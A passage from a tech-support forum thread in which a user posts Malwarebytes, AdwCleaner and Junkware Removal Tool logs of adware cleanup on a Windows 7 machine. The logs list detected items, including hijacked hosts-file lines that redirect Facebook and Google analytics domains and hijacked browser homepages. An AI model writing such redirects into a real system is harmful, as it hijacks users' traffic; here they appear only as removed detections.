    PUP.Optional.Goobzo.Gen, C:\Program Files\Common Files\Noobzo\GNUpdate\smci64.dll, Quarantined, [f5aa75fea9f10e28c1b4616608fa748c],
    PUP.Optional.Goobzo.Gen, C:\Program Files\Common Files\Noobzo\GNUpdate\smi32.exe, Quarantined, [f5aa75fea9f10e28c1b4616608fa748c],
    PUP.Optional.Goobzo.Gen, C:\Program Files\Common Files\Noobzo\GNUpdate\smi64.exe, Quarantined, [f5aa75fea9f10e28c1b4616608fa748c],
    PUP.Optional.Goobzo.Gen, C:\Program Files\Common Files\Noobzo\GNUpdate\SMUninstall.exe, Quarantined, [f5aa75fea9f10e28c1b4616608fa748c],
    PUP.Optional.Goobzo.Gen, C:\Program Files\Common Files\Noobzo\GNUpdate\smw.sys, Quarantined, [f5aa75fea9f10e28c1b4616608fa748c],
    PUP.Optional.Tuto4PC, C:\Users\Administrator\AppData\Local\tuto_monetize_120160918\tuto_monetize_120160918\2.00\cnf.cyl, Quarantined, [c9d6244f5f3b9c9ac21376517989d729],
    PUP.Optional.Tuto4PC, C:\Users\Administrator\AppData\Local\tuto_monetize_120160918\tuto_monetize_120160918\2.00\eorezo.cyl, Quarantined, [c9d6244f5f3b9c9ac21376517989d729],
    PUP.Optional.LockHomepage, C:\Users\Administrator\AppData\Roaming\lockhomepage\LockHomePage.ini, Quarantined, [5c431162108ae3539b92dcf325df60a0],
    PUP.Optional.Linkury.ACMB1, C:\Program Files (x86)\Common Files\Softcof\InstallationConfiguration.xml, Quarantined, [d0cf274c38620d294587afed9272dc24],
    PUP.Optional.Linkury.ACMB1, C:\Program Files (x86)\Common Files\Softcof\uninstall.dat, Quarantined, [d0cf274c38620d294587afed9272dc24],
    PUP.Optional.Linkury.ACMB1, C:\Program Files (x86)\Common Files\Softcof\uninstall.exe, Quarantined, [d0cf274c38620d294587afed9272dc24],
    PUP.Optional.Linkury.ACMB1, C:\Program Files (x86)\Common Files\Softcof\uninstall.ico, Quarantined, [d0cf274c38620d294587afed9272dc24],
    PUP.Optional.Linkury.ACMB1, C:\Program Files (x86)\Common Files\K-Fax\InstallationConfiguration.xml, Quarantined, [3b64f3804951f145d809c6d626de2ed2],
    PUP.Optional.Linkury.ACMB1, C:\Program Files (x86)\Common Files\K-Fax\uninstall.dat, Quarantined, [3b64f3804951f145d809c6d626de2ed2],
    PUP.Optional.Linkury.ACMB1, C:\Program Files (x86)\Common Files\K-Fax\uninstall.exe, Quarantined, [3b64f3804951f145d809c6d626de2ed2],
    PUP.Optional.Linkury.ACMB1, C:\Program Files (x86)\Common Files\K-Fax\uninstall.ico, Quarantined, [3b64f3804951f145d809c6d626de2ed2],
    PUP.Optional.VBates.BrwsrFlsh, C:\Program Files\Icattib\tree.js, Quarantined, [019ea6cd6238c86e12d6e1bb48bcc040],
    PUP.Optional.VBates.BrwsrFlsh, C:\Program Files\Icattib\Orosbusf64.dll, Quarantined, [019ea6cd6238c86e12d6e1bb48bcc040],
    PUP.Optional.VBates.BrwsrFlsh, C:\Program Files\Icattib\config.js, Quarantined, [019ea6cd6238c86e12d6e1bb48bcc040],
    PUP.Optional.VBates.BrwsrFlsh, C:\Program Files\Icattib\Dawilore.dat, Quarantined, [019ea6cd6238c86e12d6e1bb48bcc040],
    PUP.Optional.VBates.BrwsrFlsh, C:\Program Files\Icattib\Lucwofd.dat, Quarantined, [019ea6cd6238c86e12d6e1bb48bcc040],
    PUP.Optional.VBates.BrwsrFlsh, C:\Program Files\Icattib\Naacwe64.dll, Quarantined, [019ea6cd6238c86e12d6e1bb48bcc040],
    PUP.Optional.VBates.BrwsrFlsh, C:\Program Files\Icattib\Puteaxyn.dat, Quarantined, [019ea6cd6238c86e12d6e1bb48bcc040],
    PUP.Optional.VBates.BrwsrFlsh, C:\Program Files\Icattib\setup.ico, Quarantined, [019ea6cd6238c86e12d6e1bb48bcc040],
    PUP.Optional.VBates.BrwsrFlsh, C:\Program Files\Icattib\Vugmirsaflhv.dat, Quarantined, [019ea6cd6238c86e12d6e1bb48bcc040],
    PUP.Optional.VBates.BrwsrFlsh, C:\Program Files\Icattib\wlist.js, Quarantined, [019ea6cd6238c86e12d6e1bb48bcc040],
    PUP.Optional.VBates.BrwsrFlsh, C:\Program Files\Icattib\Xesbuhs64.dll, Quarantined, [019ea6cd6238c86e12d6e1bb48bcc040],
    PUP.Optional.VBates.BrwsrFlsh, C:\Program Files\Icattib\libraries\DataExchangeScript.js, Quarantined, [019ea6cd6238c86e12d6e1bb48bcc040],
    PUP.Optional.VBates.BrwsrFlsh, C:\Program Files\Icattib\nss\certutil.exe, Quarantined, [019ea6cd6238c86e12d6e1bb48bcc040],
    PUP.Optional.VBates.BrwsrFlsh, C:\Program Files\Icattib\nss\mozcrt19.dll, Quarantined, [019ea6cd6238c86e12d6e1bb48bcc040],
    PUP.Optional.VBates.BrwsrFlsh, C:\Program Files\Icattib\nss\nspr4.dll, Quarantined, [019ea6cd6238c86e12d6e1bb48bcc040],
    PUP.Optional.VBates.BrwsrFlsh, C:\Program Files\Icattib\nss\nss3.dll, Quarantined, [019ea6cd6238c86e12d6e1bb48bcc040],
    PUP.Optional.VBates.BrwsrFlsh, C:\Program Files\Icattib\nss\plc4.dll, Quarantined, [019ea6cd6238c86e12d6e1bb48bcc040],
    PUP.Optional.VBates.BrwsrFlsh, C:\Program Files\Icattib\nss\plds4.dll, Quarantined, [019ea6cd6238c86e12d6e1bb48bcc040],
    PUP.Optional.VBates.BrwsrFlsh, C:\Program Files\Icattib\nss\smime3.dll, Quarantined, [019ea6cd6238c86e12d6e1bb48bcc040],
    PUP.Optional.VBates.BrwsrFlsh, C:\Program Files\Icattib\nss\softokn3.dll, Quarantined, [019ea6cd6238c86e12d6e1bb48bcc040],
    PUP.Optional.VBates.BrwsrFlsh, C:\Program Files\Icattib\resources\config.js, Quarantined, [019ea6cd6238c86e12d6e1bb48bcc040],
    PUP.Optional.VBates.BrwsrFlsh, C:\Program Files\Icattib\resources\LocalScript.js, Quarantined, [019ea6cd6238c86e12d6e1bb48bcc040],
    PUP.Optional.VBates.BrwsrFlsh, C:\Program Files\Icattib\resources\uninstall.html, Quarantined, [019ea6cd6238c86e12d6e1bb48bcc040],
    PUP.Optional.VBates.BrwsrFlsh, C:\Program Files\Icattib\resources\wlist.js, Quarantined, [019ea6cd6238c86e12d6e1bb48bcc040],
    PUP.Optional.SearchProtect, C:\Users\Administrator\AppData\Local\bvyvcvd\bahvxfk, Quarantined, [0996dd969ffb76c06891c8d4b4508878],
    PUP.Optional.SearchProtect, C:\Users\Administrator\AppData\Local\bvyvcvd\mkfvxfk, Quarantined, [0996dd969ffb76c06891c8d4b4508878],
    PUP.Optional.SearchProtect, C:\Users\Administrator\AppData\Local\bvyvcvd\pvpqbjobmlpfqlovvawq, Quarantined, [0996dd969ffb76c06891c8d4b4508878],
    PUP.Optional.SearchProtect, C:\Users\Administrator\AppData\Local\bvyvcvd\qokvxfk, Quarantined, [0996dd969ffb76c06891c8d4b4508878],
    PUP.Optional.SearchProtect, C:\Users\Administrator\AppData\Local\bvyvcvd\rfobmlpfqlovvawq, Quarantined, [0996dd969ffb76c06891c8d4b4508878],
    PUP.Optional.SearchProtect, C:\Users\Administrator\AppData\Local\bvyvcvd\rpboobmlpfqlovvawq, Quarantined, [0996dd969ffb76c06891c8d4b4508878],
    PUP.Optional.SearchProtect, C:\Users\Administrator\AppData\Local\bvyvcvd\stb.dat, Quarantined, [0996dd969ffb76c06891c8d4b4508878],
    PUP.Optional.SearchProtect, C:\Users\Administrator\AppData\Local\bvyvcvd\ycfvxfk, Quarantined, [0996dd969ffb76c06891c8d4b4508878],
    PUP.Optional.Linkury.ACMB1, C:\Users\Administrator\AppData\Roaming\Config.xml, Quarantined, [d5caa0d30199de58d4ede9b393719967],
    PUP.Optional.Linkury.ACMB1, C:\Users\Administrator\AppData\Roaming\InstallationConfiguration.xml, Quarantined, [9609056ed7c3d165e5dd89134abac838],
    PUP.Optional.Search.ShrtCln, C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jruxmgi6.default\prefs.js, Good: (), Bad: (user_pref("browser.newtab.url", "http://www-searching.com/?site=shyo...0cshmoau,488cdb43-66e8-4d85-9ddc-52057119e93e,");), Replaced,[851aff748a10340242672e6b6d97c739]
    PUP.Optional.Search.ShrtCln, C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jruxmgi6.default\prefs.js, Good: (user_pref("browser.startup.homepage", "https://www.malwarebytes.org/restorebrowser/), Bad: (user_pref("browser.startup.homepage", "http://www-searching.com/?site=shyo...0cshmoau,488cdb43-66e8-4d85-9ddc-52057119e93e,");), Replaced,[9b046d06b6e4bf77fc9ec6d9e420fa06]
    PUP.Optional.NavSmart.ClnShrt, C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jruxmgi6.default\sessionstore-backups\recovery.js, Good: (), Bad: (navsmart), Replaced,[e4bb720193074de94aba3a666a9a649c]
    PUM.Optional.FireFoxSearchOverride, C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jruxmgi6.default\user.js, Quarantined, [5e412d46782214226742138856aeb24e],
    Rogue.TechSupportScam, C:\Users\Administrator\AppData\Roaming\st, Quarantined, [7d221063207a50e662f140b0ce36b24e],
    PUP.Optional.HijackHosts.Gen, C:\Windows\System32\guu\puii\gajf.dat, Quarantined, [dfc0244f8515d1650da6eaaf61a3d22e],
    Hijack.Host, C:\Windows\System32\drivers\etc\hosts, Good: (), Bad: (107.178.247.130 connect.facebook.net), Replaced,[7728a9ca24760d29425b534ab74db54b]
    Hijack.Host, C:\Windows\System32\drivers\etc\hosts, Good: (), Bad: (.facebook.net
    107.178.255.88 www.go), Replaced,[efb03e35c1d96ec8a5f8138acc380ff1]
    Hijack.Host, C:\Windows\System32\drivers\etc\hosts, Good: (), Bad: (107.178.248.130 static.doubleclick.net), Replaced,[019e6d06a9f18bab3668fda0966e7987]
    Hijack.Host, C:\Windows\System32\drivers\etc\hosts, Good: (), Bad: (.facebook.net
    107.178.255.88 www.goog), Replaced,[1d825023c9d1c86ec9d5376655af718f]
    Hijack.Host, C:\Windows\System32\drivers\etc\hosts, Good: (), Bad: (107.178.255.88 www.google-analytics.com), Replaced,[722dd69d7624ee48e2bdd9c40cf89967]
    Hijack.Host, C:\Windows\System32\drivers\etc\hosts, Good: (), Bad: (nalytics.com
    107.178.255.88 www.s), Replaced,[029d90e3fc9ea1957629d9c436ce6997]
    Hijack.Host, C:\Windows\System32\drivers\etc\hosts, Good: (), Bad: (gle-analytics.com
    107.178.255), Replaced,[c5dafb78ecaeba7c930c59443dc710f0]
    Hijack.Host, C:\Windows\System32\drivers\etc\hosts, Good: (), Bad: (.google-analytics.com
    107.178.255.88 w), Replaced,[46598ce79505280e1887009d887cd729]
    Hijack.Host, C:\Windows\System32\drivers\etc\hosts, Good: (), Bad: (nalytics.com
    107.178.255.88 www.statcounte), Replaced,[376894df5f3ba3936a35d4c9f60e3ec2]
    Hijack.Host, C:\Windows\System32\drivers\etc\hosts, Good: (), Bad: (tics.com
    107.178.255.88 www.statco), Replaced,[fda2e0939802a78fdbc44a538a7a1ce4]
    Hijack.Host, C:\Windows\System32\drivers\etc\hosts, Good: (), Bad: (er.com
    107.178.255.88 ssl.google-analy), Replaced,[029d442f8119e155207f425b4eb6ce32]

    Physical Sectors: 0
    (No malicious items detected)


    (end)
     
  10. photiost

    photiost Established Techie7 Member

    Yay !!

    Nasty Blue screen no longer popping up ...

    Will continue with AdwCleaner
     
  11. photiost

    photiost Established Techie7 Member

    # AdwCleaner v6.020 - Logfile created 18/09/2016 at 21:02:48
    # Updated on 14/09/2016 by ToolsLib
    # Database : 2016-09-18.1 [Server]
    # Operating System : Windows 7 Professional Service Pack 1 (X64)
    # Username : Administrator - DELL35X8BT1
    # Running from : C:\Users\Administrator\Downloads\adwcleaner_6.020.exe
    # Mode: Clean
    # Support : https://toolslib.net/forum



    ***** [ Services ] *****

    [-] Service deleted: Kuaizip Update Checker
    [-] Service deleted: KuaiZipDrive2
    [-] Service deleted: ComputerZLock
    [-] Service deleted: ComputerZ_x64
    [-] Service deleted: HpSvc


    ***** [ Folders ] *****

    [-] Folder deleted: C:\Program Files (x86)\sunnydayb
    [-] Folder deleted: C:\Users\Public\Documents\Downloaded Installers\{0088BAD5-E065-4A0F-B4A9-3DB6803D495B}
    [-] Folder deleted: C:\WINDOWS\Installer\{0088BAD5-E065-4A0F-B4A9-3DB6803D495B}
    [-] Folder deleted: C:\Users\Administrator\AppData\Roaming\Kuaizip
    [#] Folder deleted on reboot: C:\Users\Administrator\AppData\Roaming\KuaiZip
    [-] Folder deleted: C:\Users\Administrator\AppData\Roaming\LuDaShi
    [-] Folder deleted: C:\Users\Administrator\AppData\Roaming\Softlink
    [-] Folder deleted: C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Win Tune Pro
    [-] Folder deleted: C:\Users\Public\Documents\Downloaded Installers
    [#] Folder deleted on reboot: C:\Program Files (x86)\Kuaizip
    [#] Folder deleted on reboot: C:\Program Files (x86)\KuaiZip
    [-] Folder deleted: C:\Users\Administrator\AppData\Local\app
    [-] Folder deleted: C:\uninst


    ***** [ Files ] *****

    [-] File deleted: C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\KuaiZip.lnk
    [-] File deleted: C:\Users\Administrator\Desktop\KuaiZip.lnk
    [-] File deleted: C:\WINDOWS\SysNative\LavasoftTcpService64.dll
    [-] File deleted: C:\WINDOWS\SysNative\LavasoftTcpServiceOff.ini
    [-] File deleted: C:\WINDOWS\SysNative\bi3.exe
    [-] File deleted: C:\WINDOWS\SysNative\drivers\swdumon.sys
    [-] File deleted: C:\WINDOWS\SysNative\drivers\KuaiZipDrive2.sys
    [-] File deleted: C:\WINDOWS\SysWOW64\lavasofttcpservice.dll
    [-] File deleted: C:\WINDOWS\SysWOW64\LavasoftTcpServiceOff.ini
    [-] File deleted: C:\Users\Administrator\AppData\Local\uninstallssl.exe
    [-] File deleted: C:\Users\Administrator\AppData\Roaming\Mozilla\Firefox\Profiles\jruxmgi6.default\invalidprefs.js


    ***** [ DLL ] *****

    [!] File not disinfected: C:\WINDOWS\SysWOW64\dnsapi.dll


    ***** [ WMI ] *****



    ***** [ Shortcuts ] *****



    ***** [ Scheduled Tasks ] *****



    ***** [ Registry ] *****

    [-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DriverUpdate
    [#] Key deleted on reboot: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DriverUpdate_is1
    [-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{0088BAD5-E065-4A0F-B4A9-3DB6803D495B}
    [#] Key deleted on reboot: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{0088BAD5-E065-4A0F-B4A9-3DB6803D495B}_is1
    [-] Key deleted: HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\SCService
    [#] Key deleted on reboot: [x64] HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\SCService
    [-] Key deleted: HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\nrtService
    [#] Key deleted on reboot: [x64] HKLM\SYSTEM\CurrentControlSet\Services\EventLog\Application\nrtService
    [-] Key deleted: HKLM\SOFTWARE\Classes\KuaiZip_FileAsso_Origin
    [-] Key deleted: HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.DataContainer
    [-] Key deleted: HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.DataContainer.1
    [-] Key deleted: HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.DataController
    [-] Key deleted: HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.DataController.1
    [-] Key deleted: HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.DataTable
    [-] Key deleted: HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.DataTable.1
    [-] Key deleted: HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.DataTableFields
    [-] Key deleted: HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.DataTableFields.1
    [-] Key deleted: HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.DataTableHolder
    [-] Key deleted: HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.DataTableHolder.1
    [-] Key deleted: HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.LSPLogic
    [-] Key deleted: HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.LSPLogic.1
    [-] Key deleted: HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.ReadOnlyManager
    [-] Key deleted: HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.ReadOnlyManager.1
    [-] Key deleted: HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.WFPController
    [-] Key deleted: HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.WFPController.1
    [-] Key deleted: HKLM\SOFTWARE\Classes\PCSU.SysUtils
    [-] Key deleted: HKLM\SOFTWARE\Classes\PCSU.SysUtils.1
    [-] Key deleted: HKLM\SOFTWARE\Classes\QZipShell2.ContextMenuExt
    [-] Key deleted: HKLM\SOFTWARE\Classes\QZipShell2.ContextMenuExt.1
    [-] Key deleted: HKLM\SOFTWARE\Classes\QZipShell2.DragDropMenu
    [-] Key deleted: HKLM\SOFTWARE\Classes\QZipShell2.DragDropMenu.1
    [-] Key deleted: HKLM\SOFTWARE\Classes\QZipShell2.KYDropHandler
    [-] Key deleted: HKLM\SOFTWARE\Classes\QZipShell2.KYDropHandler.1
    [-] Key deleted: HKLM\SOFTWARE\Classes\QZipShell2.KzShlobj
    [-] Key deleted: HKLM\SOFTWARE\Classes\QZipShell2.KzShlobj.1
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\KuaiZip_FileAsso_Origin
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.DataContainer
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.DataContainer.1
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.DataController
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.DataController.1
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.DataTable
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.DataTable.1
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.DataTableFields
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.DataTableFields.1
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.DataTableHolder
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.DataTableHolder.1
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.LSPLogic
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.LSPLogic.1
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.ReadOnlyManager
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.ReadOnlyManager.1
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.WFPController
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\LavasoftTcpServiceLib.WFPController.1
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\PCSU.SysUtils
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\PCSU.SysUtils.1
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\QZipShell2.ContextMenuExt
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\QZipShell2.ContextMenuExt.1
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\QZipShell2.DragDropMenu
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\QZipShell2.DragDropMenu.1
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\QZipShell2.KYDropHandler
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\QZipShell2.KYDropHandler.1
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\QZipShell2.KzShlobj
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\QZipShell2.KzShlobj.1
    [-] Key deleted: HKLM\SOFTWARE\Classes\AppID\{425F4ABF-B8E4-402D-9E49-06E494EB8DBF}
    [-] Key deleted: HKLM\SOFTWARE\Classes\AppID\{9CC34070-3A38-4C7A-89CB-EF8177EF07A1}
    [-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{B89F5C49-51DB-4974-AB5A-E25901AA339C}
    [-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{E9B5B0D2-D08A-49FC-8B5C-159B60BAA268}
    [-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{08ACFB57-8187-47F0-AF93-56360D03634A}
    [-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{0015CAC9-FC30-4CD0-BFAA-7412CC2C4DD9}
    [-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{26C7AFDB-3690-449E-B979-B0AF5CC56DD4}
    [-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{3A5A5381-DAAF-4C0D-B032-2C66B3EE4A8D}
    [-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{472EF1D2-4AAE-470D-AE85-6AF8177916FD}
    [-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{8F010D54-C023-457F-AF03-497EACB6D519}
    [-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{9A754403-27B1-4ED7-96D7-588F07888EBF}
    [-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{CB31FF8F-BF80-4D2B-ADBE-12C6F5347890}
    [-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{FCAA532B-E807-4027-940C-BA16B9D50105}
    [-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{6C42038D-817A-472C-8C2A-EF46F1DA576D}
    [-] Key deleted: HKLM\SOFTWARE\Classes\Interface\{873C7DA8-195D-4D5A-B830-C5E2831901EA}
    [-] Key deleted: HKLM\SOFTWARE\Classes\TypeLib\{ED62BC6E-64F1-46BE-866F-4C8DC0DF7057}
    [-] Key deleted: HKU\S-1-5-21-1896049756-2371463424-3974721238-500\Software\FastCompress-Zip
    [-] Key deleted: HKU\S-1-5-21-1896049756-2371463424-3974721238-500\Software\K9Tools
    [-] Key deleted: HKU\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Microsoft\Tinstalls
    [-] Key deleted: HKU\S-1-5-21-1896049756-2371463424-3974721238-500\Software\SlimWare Utilities Inc
    [-] Key deleted: HKU\S-1-5-21-1896049756-2371463424-3974721238-500\Software\osTip
    [-] Key deleted: HKU\S-1-5-21-1896049756-2371463424-3974721238-500\Software\INSTALLPATH\STATUS
    [-] Key deleted: HKU\S-1-5-21-1896049756-2371463424-3974721238-500\Software\SNDA
    [-] Key deleted: HKU\S-1-5-21-1896049756-2371463424-3974721238-500\Software\Ludashi
    [-] Key deleted: HKU\S-1-5-21-1896049756-2371463424-3974721238-500\Software\AppDataLow\Software\WikiZ
    [#] Key deleted on reboot: HKCU\Software\FastCompress-Zip
    [#] Key deleted on reboot: HKCU\Software\K9Tools
    [#] Key deleted on reboot: HKCU\Software\Microsoft\Tinstalls
    [#] Key deleted on reboot: HKCU\Software\SlimWare Utilities Inc
    [#] Key deleted on reboot: HKCU\Software\osTip
    [#] Key deleted on reboot: HKCU\Software\INSTALLPATH\STATUS
    [#] Key deleted on reboot: HKCU\Software\SNDA
    [#] Key deleted on reboot: HKCU\Software\Ludashi
    [#] Key deleted on reboot: HKCU\Software\AppDataLow\Software\WikiZ
    [-] Key deleted: HKLM\SOFTWARE\SLIMWARE UTILITIES, INC.
    [-] Key deleted: HKLM\SOFTWARE\FastCompress-Zip
    [-] Key deleted: HKLM\SOFTWARE\K9Tools
    [-] Key deleted: HKLM\SOFTWARE\SearchModule
    [-] Key deleted: HKLM\SOFTWARE\SlimWare Utilities Inc
    [-] Key deleted: HKLM\SOFTWARE\Lavasoft\Web Companion
    [-] Key deleted: HKLM\SOFTWARE\Microsoft\{94ebd7b5-82ae-449t-b679-3d04078ed154}
    [-] Key deleted: HKLM\SOFTWARE\Xtp
    [-] Key deleted: HKLM\SOFTWARE\Ludashi
    [-] Key deleted: HKLM\SOFTWARE\ComputerZ
    [-] Key deleted: HKLM\SOFTWARE\MustangUp
    [-] Key deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\11598763487076930564
    [#] Key deleted on reboot: [x64] HKCU\Software\FastCompress-Zip
    [#] Key deleted on reboot: [x64] HKCU\Software\K9Tools
    [#] Key deleted on reboot: [x64] HKCU\Software\Microsoft\Tinstalls
    [#] Key deleted on reboot: [x64] HKCU\Software\SlimWare Utilities Inc
    [#] Key deleted on reboot: [x64] HKCU\Software\osTip
    [#] Key deleted on reboot: [x64] HKCU\Software\INSTALLPATH\STATUS
    [#] Key deleted on reboot: [x64] HKCU\Software\SNDA
    [#] Key deleted on reboot: [x64] HKCU\Software\Ludashi
    [#] Key deleted on reboot: [x64] HKCU\Software\AppDataLow\Software\WikiZ
    [-] Key deleted: [x64] HKLM\SOFTWARE\SearchModule
    [-] Key deleted: [x64] HKLM\SOFTWARE\Xtp
    [-] Key deleted: HKLM\SOFTWARE\Classes\Installer\UpgradeCodes\50D2BAFD096C90345A82B25A790BDF69
    [#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\Installer\UpgradeCodes\50D2BAFD096C90345A82B25A790BDF69
    [-] Key deleted: [x64] HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UpgradeCodes\50D2BAFD096C90345A82B25A790BDF69
    [-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\adnetworkperformance.com
    [-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\castplatform.com
    [-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\cdn.castplatform.com
    [-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\navsmart.info
    [-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\nps.pastaleads.com
    [-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\pastaleads.com
    [-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\DOMStorage\utop.it
    [#] Key deleted on reboot: [x64] HKCU\Software\Microsoft\Internet Explorer\DOMStorage\adnetworkperformance.com
    [#] Key deleted on reboot: [x64] HKCU\Software\Microsoft\Internet Explorer\DOMStorage\castplatform.com
    [#] Key deleted on reboot: [x64] HKCU\Software\Microsoft\Internet Explorer\DOMStorage\cdn.castplatform.com
    [#] Key deleted on reboot: [x64] HKCU\Software\Microsoft\Internet Explorer\DOMStorage\navsmart.info
    [#] Key deleted on reboot: [x64] HKCU\Software\Microsoft\Internet Explorer\DOMStorage\nps.pastaleads.com
    [#] Key deleted on reboot: [x64] HKCU\Software\Microsoft\Internet Explorer\DOMStorage\pastaleads.com
    [#] Key deleted on reboot: [x64] HKCU\Software\Microsoft\Internet Explorer\DOMStorage\utop.it
    [-] Value deleted: HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [EasyHotspot]
    [-] Key deleted: HKLM\SYSTEM\CurrentControlSet\Control\Class\{0C95ABFE-4FB6-49DB-B22F-0E1F5FC4BEEC}
    [-] Key deleted: HKLM\SYSTEM\CurrentControlSet\Control\Class\{EEEFACB3-729F-4484-B66D-E7A7917BBFC1}
    [-] Key deleted: HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\IMAGE FILE EXECUTION OPTIONS\RONZAP.EXE
    [-] Key deleted: HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\webcompanion.com


    ***** [ Web browsers ] *****

    [-] Chrome preferences cleaned: "browser.newtabpage.pinned"
    [-] Chrome preferences cleaned: "browser.newtabpage.url" - "hxxp://www.bing.com/?pc=COSP&ptag=D091816-A251FF33716&form=CONMHP&conlogo=CT3334491"


    *************************

    :: "Tracing" keys deleted
    :: Winsock settings cleared

    *************************

    C:\AdwCleaner\AdwCleaner[C0].txt - [31027 Bytes] - [18/09/2016 21:02:48]
    C:\AdwCleaner\AdwCleaner[S0].txt - [26164 Bytes] - [18/09/2016 20:57:06]
    C:\AdwCleaner\AdwCleaner[S1].txt - [26191 Bytes] - [18/09/2016 20:59:43]

    ########## EOF - C:\AdwCleaner\AdwCleaner[C0].txt - [31249 Bytes] ##########
     
  12. photiost

    photiost Established Techie7 Member

    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    Junkware Removal Tool (JRT) by Malwarebytes
    Version: 8.0.7 (07.03.2016)
    Operating System: Windows 7 Professional x64
    Ran by Administrator (Administrator) on 18/09/2016 at 21:08:15.34
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




    File System: 36

    Successfully deleted: C:\Users\Administrator\AppData\Local\crashrpt (Folder)
    Successfully deleted: C:\Users\Administrator\Appdata\LocalLow\company (Folder)
